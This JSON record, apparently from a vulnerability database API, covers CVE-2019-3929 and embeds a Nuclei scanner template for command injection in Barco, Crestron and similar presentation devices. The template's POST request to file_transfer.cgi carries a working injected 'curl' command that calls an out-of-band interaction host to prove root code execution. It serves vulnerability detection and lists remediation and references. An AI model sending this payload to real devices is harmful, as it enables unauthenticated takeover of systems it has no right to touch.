{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-3929/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-3929/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-3929/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-3929/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-3929/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-3929"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-3929"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2019/CVE-2019-3929.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2019-3929\n\ninfo:\n  name: Barco/AWIND OEM Presentation Platform - Remote Command Injection\n  author: _0xf4n9x_\n  severity: critical\n  description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.\n  remediation: |\n    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n  reference:\n    - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html\n    - https://www.exploit-db.com/exploits/46786/\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-3929\n    - https://www.tenable.com/security/research/tra-2019-20\n    - http://packetstormsecurity.com/files/155948/Barco-WePresent-file_transfer.cgi-Command-Injection.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-3929\n    cwe-id: CWE-78,CWE-79\n    epss-score: 0.98952\n    epss-percentile: 0.99929\n    cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: crestron\n    product: am-100_firmware\n  tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron,vkev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/cgi-bin/file_transfer.cgi\"\n\n    body: \"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27\"\n\n    headers:\n      Content-Type: application/x-www-form-urlencoded\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 4b0a004830460221008919ef29b7f91a0ea0ffbb84e960ed2fa6243b167a72fd9464ba9baa77243ba2022100c6d4933a901ead8dcb99ba3b005ac2901ea6b70a099595c68ef71e08ea98d28b:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2019-3929"
}